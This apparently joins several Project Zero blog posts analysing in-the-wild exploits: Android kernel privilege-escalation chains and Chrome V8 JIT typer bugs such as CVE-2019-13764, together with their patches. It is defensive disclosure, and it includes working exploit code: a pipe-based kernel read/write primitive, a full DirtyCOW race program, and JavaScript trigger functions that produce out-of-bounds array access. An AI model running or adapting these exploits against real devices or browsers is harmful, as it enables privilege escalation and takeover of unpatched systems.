addr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct, this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when reading to and writing from a pipe; a minimal sketch follows this list.
Userspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See KEEN Lab "Emerging Defense in Android Kernel" for more information.
Point to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See KEEN Lab "Emerging Defense in Android Kernel" for more information.
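Here is the sketch of the addr_limit pipe primitive promised above. It assumes a separate kernel bug has already set addr_limit to an all-ones value so that access_ok() passes for kernel pointers; on a healthy kernel these calls simply fail with EFAULT:

#include <stddef.h>
#include <unistd.h>

// Assumes pipe(kfd) has been called and addr_limit has been corrupted.
static int kfd[2];

int kernel_read(unsigned long kaddr, void *buf, size_t len) {
  // The kernel copies from kaddr into the pipe as if it were user memory...
  if (write(kfd[1], (void *)kaddr, len) != (ssize_t)len) return -1;
  // ...and we drain the pipe into our own buffer.
  return read(kfd[0], buf, len) == (ssize_t)len ? 0 : -1;
}

int kernel_write(unsigned long kaddr, const void *buf, size_t len) {
  if (write(kfd[1], buf, len) != (ssize_t)len) return -1;
  // Reading "into" a kernel pointer makes the kernel write our data there.
  return read(kfd[0], (void *)kaddr, len) == (ssize_t)len ? 0 : -1;
}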
The vulnerabilities:
CVE-2015-1805 is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.
CVE-2016-3809 is an information leak, disclosing the address of a kernel sock structure.
Strategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.
Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.
Copy/Paste: ~90%. The exploit strategy is the same as public exploit code, and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.
Additional References: KEEN Lab "Talk is Cheap, Show Me the Code".
The vulnerabilities: Same as iovy, plus:
P0-822 is an information leak, allowing the reading of arbitrary kernel memory.
Strategy: Same as above.
Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.
Copy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is a direct copy-paste.
The vulnerabilities: Same as iovy.
Strategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either "read and writev" or "write and readv" threads to get a reusable kernel read-write.
Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.
Copy/Paste: ~30%. The heap-spray technique is the same as another public exploit, but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not.
The vulnerability: According to the release notes, CVE-2015-0569 is a heap overflow in Qualcomm's wireless extension IOCTLs. This appears to be where the exploit name is derived from; however, as you can see in the Qualcomm advisory, there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.
Strategy: Corrupt return address; return to userspace shellcode.
Subsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.
Copy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.
Additional References: KEEN Lab "Rooting every Android".
The vulnerability: CVE-2016-0820, a linear data-section overflow resulting from a lack of bounds checking.
Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.
Copy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker - it seems most likely that this was an independent implementation written after KEEN lab's presentation and based on their description.
Additional References: KEEN Lab "Rooting every Android".
The vulnerability: CVE-2016-5195, also known as DirtyCOW.
Strategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.
Subsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.
Copy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.
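For reference, the basic public CVE-2016-5195 race (the /proc/self/mem write-thread variant mentioned above) looks roughly like this; the target path and payload are placeholders, and, as noted, the attacker's real complexity lives in everything built on top of this primitive:

#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

// Classic public DirtyCOW primitive: race a /proc/self/mem write against
// madvise(MADV_DONTNEED) on a private mapping of a read-only file.
static void *map;
static const char payload[] = "OWNED";

static void *madvise_loop(void *arg) {
  for (int i = 0; i < 1000000; i++)
    madvise(map, 0x1000, MADV_DONTNEED);  // keep discarding the COW copy
  return NULL;
}

static void *write_loop(void *arg) {
  int fd = open("/proc/self/mem", O_RDWR);
  for (int i = 0; i < 1000000; i++) {
    lseek(fd, (off_t)(uintptr_t)map, SEEK_SET);
    write(fd, payload, sizeof(payload) - 1);  // races the write into the page cache
  }
  close(fd);
  return NULL;
}

int main(void) {
  int fd = open("/system/bin/placeholder", O_RDONLY);  // hypothetical target file
  struct stat st;
  if (fd < 0 || fstat(fd, &st) < 0) return 1;
  map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
  pthread_t t1, t2;
  pthread_create(&t1, NULL, madvise_loop, NULL);
  pthread_create(&t2, NULL, write_loop, NULL);
  pthread_join(t1, NULL);
  pthread_join(t2, NULL);
  return 0;
}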
The vulnerability: CVE-2018-9568, also known as WrongZone.
Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.
Copy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.
Additional References: Alibaba Security "From Zero to Root".
Baidu Security Lab: "KARMA shows you offense and defense".
Nothing very interesting, which is interesting in itself!
Here is an attacker who has access to 0day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.
It certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.
One explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a "low-value" privilege-elevation capability. Alternatively, perhaps exploit server URLs that we had access to were specifically configured for a user that they know uses an older device that would be vulnerable to one of these exploits?
Based on all the information available, it's likely that they have more device-specific 0day exploits. We might just not have tested with a device/firmware version that they supported for those exploits and inadvertently missed their more modern exploits.
About the only solid conclusion that we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long past when their original manufacturers provide support for them.
This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 5: Android Post-Exploitation.
Published: 2021-01-12 17:36:00
Popularity: 8
Author: Ryan
This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.
Posted by Sergei Glazunov, Project Zero
This post only covers one of the exploits, specifically a renderer exploit targeting Chrome 73-78 on Android. We use it as an opportunity to talk about an interesting vulnerability class in Chrome’s JavaScript engine.
One of the features that make JavaScript code especially difficult to optimize is the dynamic type system. Even for a trivial expression like a + b the engine has to support a multitude of cases depending on whether the parameters are numbers, strings, booleans, objects, etc. JIT compilation wouldn’t make much sense if the compiler always had to emit machine code that could handle every possible type combination for every JS operation. Chrome’s JavaScript engine, V8, tries to overcome this limitation through type speculation. During the first several invocations of a JavaScript function, the interpreter records the type information for various operations such as parameter accesses and property loads. If the function is later selected to be JIT compiled, TurboFan, which is V8’s newest compiler, makes an assumption that the observed types will be used in all subsequent calls, and propagates the type information throughout the whole function graph using the set of rules derived from the language specification. For example: if at least one of the operands to the addition operator is a string, the output is guaranteed to be a string as well; Math.random() always returns a number; and so on. The compiler also puts runtime checks for the speculated types that trigger deoptimization (i.e., revert to execution in the interpreter and update the type feedback) in case one of the assumptions no longer holds.
For integers, V8 goes even further and tracks the possible range of nodes. The main reason behind that is that even though the ECMAScript specification defines Number as the 64-bit floating point type, internally, TurboFan always tries to use the most efficient representation possible in a given context, which could be a 64-bit integer, 31-bit tagged integer, etc. Range information is also employed in other optimizations. For example, the compiler is smart enough to figure out that in the following code snippet, the branch can never be taken and therefore eliminate the whole if statement:
a = Math.min(a, 1);
if (a > 2) {
  return 3;
}
Now, imagine there’s an issue that makes TurboFan believe that the function vuln() returns a value in the range [0; 2] whereas its actual range is [0; 4]. Consider the code below:
a = vuln(a);
let array = [1, 2, 3];
return array[a];
If the engine has never encountered an out-of-bounds access attempt while running the code in the interpreter, it will instruct the compiler to transform the last line into a sequence that at a certain optimization phase, can be expressed by the following pseudocode:
if (a >= array.length) {
  deoptimize();
}
let elements = array.[[elements]];
return elements.get(a);
get() acts as a C-style element access operation and performs no bounds checks. In subsequent optimization phases the compiler will discover that, according to the available type information, the length check is redundant and eliminate it completely. Consequently, the generated code will be able to access out-of-bounds data.
The bug class outlined above is the main subject of this blog post; and bounds check elimination is the most popular exploitation technique for this class. A textbook example of such a vulnerability is the off-by-one issue in the typer rule for String.indexOf found by Stephen Röttger.
A typer vulnerability doesn’t have to immediately result in an integer range miscalculation that would lead to OOB access because it’s possible to make the compiler propagate the error. For example, if vuln() returns an unexpected boolean value, we can easily transform it into an unexpected integer:
a = vuln(a);            // predicted = false; actual = true
a = a * 10;             // predicted = 0; actual = 10
let array = [1, 2, 3];
return array[a];
Another notable bug report by Stephen demonstrates that even a subtle mistake such as omitting negative zero can be exploited in the same fashion.
At a certain point, this vulnerability class became extremely popular as it immediately provided an attacker with an enormously powerful and reliable exploitation primitive. Fellow Project Zero member Mark Brand has used it in his full-chain Chrome exploit. The bug class has made an appearance at several CTFs and exploit competitions. As a result, last year the V8 team issued a hardening patch designed to prevent attackers from abusing bounds check elimination. Instead of removing the checks, the compiler started marking them as “aborting”, so in the worst case the attacker can only trigger a SIGTRAP.
The renderer exploit we’ve discovered takes advantage of an issue in a function designed to compute the type of induction variables. The slightly abridged source code below is taken from the latest affected revision of V8:
Type Typer::Visitor::TypeInductionVariablePhi(Node* node) {
  [...]
  // We only handle integer induction variables (otherwise ranges
  // do not apply and we cannot do anything).
  if (!initial_type.Is(typer_->cache_->kInteger) ||
      !increment_type.Is(typer_->cache_->kInteger)) {
    // Fallback to normal phi typing, but ensure monotonicity.
    // (Unfortunately, without baking in the previous type,
    // monotonicity might be violated because we might not yet have
    // retyped the incrementing operation even though the increment's
    // type might been already reflected in the induction variable
    // phi.)
    Type type = NodeProperties::IsTyped(node) ? NodeProperties::GetType(node)
                                              : Type::None();
    for (int i = 0; i < arity; ++i) {
      type = Type::Union(type, Operand(node, i), zone());
    }
    return type;
  }
  // If we do not have enough type information for the initial value
  // or the increment, just return the initial value's type.
  if (initial_type.IsNone() ||
      increment_type.Is(typer_->cache_->kSingletonZero)) {
    return initial_type;
  }
  [...]
  InductionVariable::ArithmeticType arithmetic_type = induction_var->Type();
  double min = -V8_INFINITY;
  double max = V8_INFINITY;
  double increment_min;
  double increment_max;
  if (arithmetic_type == InductionVariable::ArithmeticType::kAddition) {
    increment_min = increment_type.Min();
    increment_max = increment_type.Max();
  } else {
    DCHECK_EQ(InductionVariable::ArithmeticType::kSubtraction, arithmetic_type);
    increment_min = -increment_type.Max();
    increment_max = -increment_type.Min();
  }
  if (increment_min >= 0) {
    // increasing sequence
    min = initial_type.Min();
    for (auto bound : induction_var->upper_bounds()) {
      Type bound_type = TypeOrNone(bound.bound);
      // If the type is not an integer, just skip the bound.
      if (!bound_type.Is(typer_->cache_->kInteger)) continue;
      // If the type is not inhabited, then we can take the initial value.
      if (bound_type.IsNone()) {
        max = initial_type.Max();
        break;
      }
      double bound_max = bound_type.Max();
      if (bound.kind == InductionVariable::kStrict) {
        bound_max -= 1;
      }
      max = std::min(max, bound_max + increment_max);
    }
    // The upper bound must be at least the initial value's upper bound.
    max = std::max(max, initial_type.Max());
  } else if (increment_max <= 0) {
    // decreasing sequence
    [...]
  } else {
    // Shortcut: If the increment can be both positive and negative,
    // the variable can go arbitrarily far, so just return integer.
    return typer_->cache_->kInteger;
  }
  [...]
  return Type::Range(min, max, typer_->zone());
}
Now, imagine the compiler processing the following JavaScript code:
for (var i = initial; i < bound; i += increment) {
  [...]
}
In short, when the loop has been identified as increasing, the lower bound of initial becomes the lower bound of i, and the upper bound is calculated as the sum of the upper bounds of bound and increment. There’s a similar branch for decreasing loops, and a special case for variables that can be both increasing and decreasing. The loop variable is named phi in the method because TurboFan operates on an intermediate representation in the static single assignment form.
Note that the algorithm only works with integers; otherwise, a more conservative estimation method is applied. However, in this context an integer refers to a rather special type, which isn’t bound to any machine integer type and can be represented as a floating point value in memory. The type holds two unusual properties that have made the vulnerability possible: it includes the values -Infinity and +Infinity, and, at the same time, it doesn’t include NaN, even though the sum of two opposing infinities is NaN.
Thus, for the following loop the algorithm infers (-Infinity; +Infinity) as the induction variable type, while the actual value after the first iteration of the loop will be NaN:
for (var i = -Infinity; i < 0; i += Infinity) { }
This one line is enough to trigger the issue. The exploit author has had to make only two minor changes: (1) parametrize increment in order to make the value of i match the future inferred type during initial invocations in the interpreter and (2) introduce an extra variable to ensure the loop eventually ends. As a result, after deobfuscation, the relevant part of the trigger function looks as follows:
function trigger(argument) {
  var j = 0;
  var increment = 100;
  if (argument > 2) {
    increment = Infinity;
  }
  for (var i = -Infinity; i <= -Infinity; i += increment) {
    j++;
    if (j == 20) {
      break;
    }
  }
  [...]
The resulting type mismatch, however, doesn’t immediately let the attacker run arbitrary code. Given that the previously widely used bounds check elimination technique is no longer applicable, we were particularly interested to learn how the attacker approached exploiting the issue.
The trigger function continues with a series of operations aimed at transforming the type mismatch into an integer range miscalculation, similarly to what would follow in the previous technique, but with the additional requirement that the computed range must be narrowed down to a single number. Since the discovered exploit targets mobile devices, the exact instruction sequence used in the exploit only works for ARM processors. For the ease of the reader, we've modified it to be compatible with x64 as well.
[...]
// The comments display the current value of the variable i, the type
// inferred by the compiler, and the machine type used to store
// the value at each step.
// Initially:
// actual = NaN, inferred = (-Infinity, +Infinity)
// representation = double

i = Math.max(i, 0x100000800);
// After step one:
// actual = NaN, inferred = [0x100000800; +Infinity)
// representation = double

i = Math.min(0x100000801, i);
// After step two:
// actual = -0x8000000000000000, inferred = [0x100000800, 0x100000801]
// representation = int64_t

i -= 0x1000007fa;
// After step three:
// actual = -2042, inferred = [6, 7]
// representation = int32_t

i >>= 1;
// After step four:
// actual = -1021, inferred = 3
// representation = int32_t

i += 10;
// After step five:
// actual = -1011, inferred = 13
// representation = int32_t
[...]
The first notable transformation occurs in step two. TurboFan decides that the most appropriate representation for i at this point is a 64-bit integer as the inferred range is entirely within int64_t, and emits the CVTTSD2SI instruction to convert the double argument. Since NaN doesn’t fit in the integer range, the instruction returns the “indefinite integer value” -0x8000000000000000. In the next step, the compiler determines it can use the even narrower int32_t type. It discards the higher 32-bit word of i, assuming that for the values in the given range it has the same effect as subtracting 0x100000000, and then further subtracts 0x7fa. The remaining two operations are straightforward; however, one might wonder why the attacker couldn’t make the compiler derive the required single-value type directly in step two. The answer lies in the optimization pass called the constant-folding reducer.
Reduction ConstantFoldingReducer::Reduce(Node* node) {
  DisallowHeapAccess no_heap_access;
  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&
      node->op()->HasProperty(Operator::kEliminatable) &&
      node->opcode() != IrOpcode::kFinishRegion) {
    Node* constant = TryGetConstant(jsgraph(), node);
    if (constant != nullptr) {
      ReplaceWithValue(node, constant);
      return Replace(constant);
[...]
If the reducer discovered that the output type of the NumberMin operator was a constant, it would replace the node with a reference to the constant, thus eliminating the type mismatch. That doesn’t apply to the SpeculativeNumberShiftRight and SpeculativeSafeIntegerAdd nodes, which represent the operations in steps four and five while the reducer is running, because both are capable of triggering deoptimization and are therefore not marked as eliminable.
Formerly, the next step would be to abuse this mismatch to optimize away an array bounds check. Instead, the attacker makes use of the incorrectly typed value to create a JavaScript array for which bounds checks always pass even outside the compiled function. Consider the following method, which attempts to optimize array constructor calls:
Reduction JSCreateLowering::ReduceJSCreateArray(Node* node) {
  [...]
  } else if (arity == 1) {
    Node* length = NodeProperties::GetValueInput(node, 2);
    Type length_type = NodeProperties::GetType(length);
    if (!length_type.Maybe(Type::Number())) {
      // Handle the single argument case, where we know that the value
      // cannot be a valid Array length.
      elements_kind = GetMoreGeneralElementsKind(
          elements_kind, IsHoleyElementsKind(elements_kind)
                             ? HOLEY_ELEMENTS
                             : PACKED_ELEMENTS);
      return ReduceNewArray(node, std::vector<Node*>{length}, *initial_map,
                            elements_kind, allocation,
                            slack_tracking_prediction);
    }
    if (length_type.Is(Type::SignedSmall()) && length_type.Min() >= 0 &&
        length_type.Max() <= kElementLoopUnrollLimit &&
        length_type.Min() == length_type.Max()) {
      int capacity = static_cast<int>(length_type.Max());
      return ReduceNewArray(node, length, capacity, *initial_map,
                            elements_kind, allocation,
                            slack_tracking_prediction);
[...]
When the argument is known to be an integer constant less than 16, the compiler inlines the array creation procedure and unrolls the element initialization loop. ReduceJSCreateArray doesn’t rely on the constant-folding reducer and implements its own, less strict equivalent that just compares the upper and lower bounds of the inferred type. Unfortunately, even after folding, the function keeps using the original argument node. The folded value is employed during initialization of the backing store, while the length property of the array is set to the original node. This means that if we pass the value we obtained at step five to the constructor, it will return an array with a negative length and a backing store that can fit 13 elements. Given that bounds checks are implemented as unsigned comparisons, the crafted array will allow us to access data well past its end. In fact, any positive value bigger than its predicted version would work as well.
The rest of the trigger function is provided below:
  [...]
  corrupted_array = Array(i);
  corrupted_array[0] = 1.1;
  ptr_leak_array = [wasm_module, array_buffer, [...], wasm_module, array_buffer];
  extra_array = [13.37, [...], 13.37, 1.234];
  return [corrupted_array, ptr_leak_array, extra_array];
}
The attacker forces TurboFan to put the data required for further exploitation right next to the corrupted array and to use the double element type for the backing store as it’s the most convenient type for dealing with out-of-bounds data in the V8 heap.
From this point on, the exploit follows the same algorithm that public V8 exploits have been following for several years: it uses the out-of-bounds access to leak the addresses of the WASM module and ArrayBuffer objects placed next to the corrupted array, corrupts the backing store pointer of the ArrayBuffer to gain arbitrary memory access, and finally overwrites the code of a WebAssembly function with the payload.
The contents of the payload, which is about half a megabyte in size, will be discussed in detail in a subsequent blog post.
Given that the vast majority of Chrome exploits we have seen at Project Zero come from either exploit competitions or VRP submissions, the most striking difference this exploit has demonstrated lies in its focus on stability and reliability. Here are some examples. Almost the entire exploit is executed inside a web worker, which means it has a separate JavaScript environment and runs in its own thread. This greatly reduces the chance of the garbage collector causing an accidental crash due to the inconsistent heap state. The main thread part is only responsible for restarting the worker in case of failure and passing status information to the attacker’s server. The exploit attempts to further reduce the time window for GC crashes by ensuring that every corrupted field is restored to the original value as soon as possible. It also employs the OOB access primitive early on to verify the processor architecture information provided in the user agent header. Finally, the author has clearly aimed to keep the number of hard-coded constants to a minimum. Despite supporting a wide range of Chrome versions, the exploit relies on a single version-dependent offset, namely, the offset in the WASM instance to the executable page pointer.
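As a rough sketch of the worker-restart pattern described above (not the actor's actual code; the worker script name and the reportStatus helper are hypothetical):

// Each worker runs in its own thread with its own V8 heap, which isolates
// the exploit from GC activity in the main JavaScript environment.
function reportStatus(status) {
  // placeholder for passing status information to the attacker's server
}

function startWorker() {
  var worker = new Worker('exploit_worker.js');
  worker.onmessage = function(event) { reportStatus(event.data); };
  worker.onerror = function() {
    worker.terminate();
    startWorker();  // restart the attempt after a failure
  };
}
startWorker();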
Even though there’s evidence this vulnerability was originally used as a 0-day, by the time we obtained the exploit, it had already been fixed. The issue was reported to Chrome by security researchers Soyeon Park and Wen Xu in November 2019 and was assigned CVE-2019-13764. The proof of concept provided in the report is shown below:
function write(begin, end, step) {
  for (var i = begin; i >= end; i += step) {
    step = end - begin;
    begin >>>= 805306382;
  }
}
var buffer = new ArrayBuffer(16384);
var view = new Uint32Array(buffer);
for (let i = 0; i < 10000; i++) {
  write(Infinity, 1, view[65536], 1);
}
As the reader can see, it’s not the most straightforward way to trigger the issue. The code resembles fuzzer output, and the reporters confirmed that the bug had been found through fuzzing. Given the available evidence, we’re fully confident that it was an independent discovery (sometimes referred to as a "bug collision").
Since the proof of concept could only lead to a SIGTRAP crash, and the reporters hadn’t demonstrated, for example, a way to trigger memory corruption, it was initially considered a low-severity issue by the V8 engineers. However, after an internal discussion, the V8 team raised the severity rating to high.
In light of the in-the-wild exploitation evidence, we decided to give the fix, which had introduced an explicit check for the NaN case, a thorough examination:
[...]
const bool both_types_integer =
    initial_type.Is(typer_->cache_->kInteger) &&
    increment_type.Is(typer_->cache_->kInteger);
bool maybe_nan = false;
// The addition or subtraction could still produce a NaN, if the integer
// ranges touch infinity.
if (both_types_integer) {
  Type resultant_type =
      (arithmetic_type == InductionVariable::ArithmeticType::kAddition)
          ? typer_->operation_typer()->NumberAdd(initial_type, increment_type)
          : typer_->operation_typer()->NumberSubtract(initial_type,
                                                      increment_type);
  maybe_nan = resultant_type.Maybe(Type::NaN());
}
// We only handle integer induction variables (otherwise ranges
// do not apply and we cannot do anything).
if (!both_types_integer || maybe_nan) {
[...]
The code makes the assumption that the loop variable may only become NaN if the sum or difference of initial and increment is NaN. At first sight, it seems like a fair assumption. The issue arises from the fact that the value of increment can be changed from inside the loop, which isn’t obvious from the exploit but is demonstrated in the proof of concept sent to Chrome. The typer takes these changes into account and reflects them in increment’s computed type. Therefore, the attacker can, for example, add a negative increment to i until the latter becomes -Infinity, then change the sign of increment and force the loop to produce NaN once more, as demonstrated by the code below:
var increment = -Infinity;
var k = 0;
for (var i = 0; i < 1; i += increment) {
  if (i == -Infinity) {
    increment = +Infinity;
  }
  if (++k > 10) {
    break;
  }
}
Thus, to “revive” the entire exploit, the attacker only needs to change a couple of lines in trigger.
The discovered variant was reported to Chrome in February along with the exploitation technique found in the exploit. This time the patch took a more conservative approach and made the function bail out as soon as the typer detects that increment can be Infinity.
[...]
// If we do not have enough type information for the initial value or
// the increment, just return the initial value's type.
if (initial_type.IsNone() ||
    increment_type.Is(typer_->cache_->kSingletonZero)) {
  return initial_type;
}
// We only handle integer induction variables (otherwise ranges do not
// apply and we cannot do anything). Moreover, we don't support infinities
// in {increment_type} because the induction variable can become NaN
// through addition/subtraction of opposing infinities.
if (!initial_type.Is(typer_->cache_->kInteger) ||
    !increment_type.Is(typer_->cache_->kInteger) ||
    increment_type.Min() == -V8_INFINITY ||
    increment_type.Max() == +V8_INFINITY) {
[...]
Additionally, ReduceJSCreateArray was updated to always use the same value for both the length property and backing store capacity, thus rendering the reported exploitation technique useless.
Unfortunately, the new patch contained an unintended change that introduced another security issue. If we look at the source code of TypeInductionVariablePhi before the patches, we find that it checks whether the type of increment is limited to the constant zero. In this case, it assigns the type of initial to the induction variable. The second patch moved the check above the line that ensures initial is an integer. In JavaScript, however, adding or subtracting zero doesn’t necessarily preserve the type, for example:
-0       + 0  =>  -0
[string] - 0  =>  [number]
[object] + 0  =>  [string]
As a result, the patched function provides us with an even wider choice of possible “type confusions”.
It was considered worthwhile to examine how difficult it would be to find a replacement for the ReduceJSCreateArray technique and exploit the new issue. The task turned out to be a lot easier than initially expected because we soon found this excellent blog post written by Jeremy Fetiveau, where he describes a way to bypass the initial bounds check elimination hardening. In short, depending on whether the engine has encountered an out-of-bounds element access attempt during the execution of a function in the interpreter, it instructs the compiler to emit either the CheckBounds or NumberLessThan node, and only the former is covered by the hardening. Consequently, the attacker just needs to make sure that the function attempts to access a non-existent array element in one of the first few invocations.
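A minimal sketch of the warm-up trick (hypothetical code, not taken from the exploit): an out-of-bounds element access during the first, interpreted invocations makes the recorded feedback cover the OOB case, so the compiled code later guards the access with a NumberLessThan comparison, which the typer can erroneously eliminate, instead of a hardened CheckBounds node.

function load(array, index) {
  return array[index];
}

var arr = [1.1, 2.2, 3.3];
load(arr, 4);  // OOB attempt in the interpreter; simply returns undefined
for (var i = 0; i < 100000; i++) {
  load(arr, 1);  // warm up until the function gets JIT-compiled
}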
We find it interesting that even though this equally powerful and convenient technique has been publicly available since last May, the attacker has chosen to rely on their own method. It is conceivable that the exploit had been developed even before the blog post came out.
Once again, the technique requires an integer with a miscalculated range, so the revamped trigger function mostly consists of various type transformations:
function trigger(arg) {
  // Initially:
  // actual = 1, inferred = any
  var k = 0;

  arg = arg | 0;
  // After step one:
  // actual = 1, inferred = [-0x80000000, 0x7fffffff]

  arg = Math.min(arg, 2);
  // After step two:
  // actual = 1, inferred = [-0x80000000, 2]

  arg = Math.max(arg, 1);
  // After step three:
  // actual = 1, inferred = [1, 2]

  if (arg == 1) {
    arg = "30";
  }
  // After step four:
  // actual = string{30}, inferred = [1, 2] or string{30}

  for (var i = arg; i < 0x1000; i -= 0) {
    if (++k > 1) {
      break;
    }
  }
  // After step five:
  // actual = number{30}, inferred = [1, 2] or string{30}

  i += 1;
  // After step six:
  // actual = 31, inferred = [2, 3]

  i >>= 1;
  // After step seven:
  // actual = 15, inferred = 1

  i += 2;
  // After step eight:
  // actual = 17, inferred = 3

  i >>= 1;
  // After step nine:
  // actual = 8, inferred = 1

  var array = [0.1, 0.1, 0.1, 0.1];
  return [array[i], array];
}
The mismatch between the number 30 and string “30” occurs in step five. The next operation is represented by the SpeculativeSafeIntegerAdd node. The typer is aware that whenever this node encounters a non-number argument, it immediately triggers deoptimization. Hence, all non-number elements of the argument type can be ignored. The unexpected integer value, which obviously doesn’t cause the deoptimization, enables us to generate an erroneous range. Eventually, the compiler eliminates the NumberLessThan node, which is supposed to protect the element access in the last line, based on the observed range.
Soon after we had identified the regression, the V8 team landed a patch that removed the vulnerable code branch, along with a number of additional hardening measures.
Furthermore, the V8 engineers have been working on a feature that allows TurboFan to insert runtime type checks into generated code. The feature should make fuzzing for typer issues much more efficient.
This blog post is meant to provide insight into the complexity of type tracking in JavaScript. The number of obscure rules and constraints an engineer has to bear in mind while working on the feature almost inevitably leads to errors, and, quite often, even the slightest issue in the typer is enough to build a powerful and reliable exploit.
Also, the reader is probably familiar with the hypothesis of an enormous disparity between the state of public and private offensive security research. The fact that we’ve discovered a rather sophisticated attacker who has exploited a vulnerability in the class that has been under the scrutiny of the wider security community for at least a couple of years suggests that there’s nevertheless a certain overlap. Moreover, we were especially pleased to see a bug collision between a VRP submission and an in-the-wild 0-day exploit.
This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 3: Chrome Exploits.
Published: 2021-01-12 17:36:00
Popularity: 9
Author: Ryan
This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.
Posted by Sergei Glazunov, Project Zero
As we continue the series on the watering hole attack discovered in early 2020, in this post we’ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.
All vulnerabilities used by the attacker are in V8, Chrome’s JavaScript engine; more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still exploited in real-world attacks against web browsers, vulnerabilities in JIT compilers offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need for a separate issue to, for example, break ASLR. Second, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.
The bugs themselves aren’t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker’s exploit development process.
This is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:
global_array = [, 1.1];

function trigger(local_array) {
  var temp = global_array[0];
  local_array[1] = {};
  return global_array[1];
}

trigger([, {}]);
trigger([, 1.1]);

for (var i = 0; i < 10000; i++) {
  trigger([, {}]);
}

print(trigger(global_array));
The first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the “shape” of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can’t point to the same object, it doesn’t invalidate the recorded map state of global_array and, consequently, eliminates the “redundant” map check in the last line of the function.
The vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.
